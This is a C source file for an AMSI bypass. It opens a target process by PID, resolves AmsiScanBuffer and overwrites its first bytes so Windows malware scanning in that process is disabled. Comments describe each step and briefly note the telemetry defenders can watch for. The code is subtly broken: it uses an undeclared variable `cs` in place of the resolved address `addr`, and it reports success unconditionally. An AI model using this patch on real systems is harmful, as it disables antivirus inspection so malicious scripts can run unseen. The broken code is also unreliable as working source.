// AMSI Scan Buffer Patching
#include <windows.h>
#include <stdio.h>
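// Reports a failed Win32 call: prints `message` together with the calling
// thread's last-error code, then returns 0.
//
// This is a report-only helper: it neither terminates the process nor changes
// control flow, so a caller that ignores the return value continues past the
// failure with whatever (possibly NULL) handle it had.
//
// GetLastError() yields a DWORD (unsigned long); %lu is the matching printf
// specifier for it.
int ErrorHandler(const char* message) {
    printf("%s : %lu\n", message, GetLastError());
    return 0;
}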
// Entry point. argv[1] is read as the decimal PID of a target process. The
// program opens that process, loads amsi into *this* process to resolve the
// address of AmsiScanBuffer, and then writes `Patch` into the target process
// at the address it resolved. Every failure branch below only calls
// ErrorHandler (which prints and returns 0) and then falls through; there is
// no early exit on any error.
//
// Defender's view: the observable events on the host are the
// PROCESS_ALL_ACCESS handle opened to the given PID and the cross-process
// WriteProcessMemory into that process at the AmsiScanBuffer location --
// an in-memory AMSI patch pattern that endpoint telemetry can key on.
int main(int argc, char* argv[]) {
HMODULE amsi;
DWORD opriv, t;   // opriv: protection saved by VirtualProtect; t: scratch for the restore call
LPVOID addr;
BOOL x;           // result of the last VirtualProtect / WriteProcessMemory call
// Bytes written over the start of AmsiScanBuffer; the variant is chosen at
// compile time by bitness (6 bytes when _WIN64 is set, 8 bytes otherwise).
#if _WIN64
char Patch[6] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
#else
char Patch[8] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
#endif
// Target PID comes straight from the first command-line argument.
char* a = argv[1];
int pid = atoi(a);
// Full-access handle to the target; on failure Proc is NULL and execution continues.
HANDLE Proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (!Proc) {
ErrorHandler("Opening Process Failed");
}
// amsi is loaded into the current (patching) process, not the target.
amsi = LoadLibrary(L"amsi");
if (!amsi) {
ErrorHandler("Opening Handle to Amsi Module Failed");
}
// resolve address of function to patch (in this process's copy of the module)
addr = GetProcAddress(amsi, "AmsiScanBuffer");
if (!addr) {
ErrorHandler("Failed to find AmsiScanBuffer Address");
}
printf("[+] AmsiScanBuffer located at %x\n", cs);
// make the memory writeable
x = VirtualProtect(cs, sizeof(Patch), PAGE_EXECUTE_READWRITE, &opriv);
if (!x) {
ErrorHandler("Failed to change ");
}
printf("[+] Changing Memory Protection to ReadWrite\n");
// memcpy if we want to patch in current process
// memcpy(cs, &Patch, sizeof(Patch));
// Patch AmsiScanBuffer in remote process.
// Cross-process write via the handle from OpenProcess; the bytes-written
// out-parameter is not requested (nullptr), so partial writes are not detected here.
x = WriteProcessMemory(Proc, cs, Patch, sizeof(Patch), nullptr);
if (!x) {
ErrorHandler("Failed to Patch AmsiScanBuffer Method");
}
printf("[+] Overwriting AmsiScanBuffer Method\n");
// set back to original protection (return value not checked)
VirtualProtect(cs, sizeof(Patch), opriv, &t);
// Printed unconditionally -- it does not reflect whether any earlier step succeeded.
printf("[+] Successfully disabled AMSI in process : %d\n", pid);
return 0;
}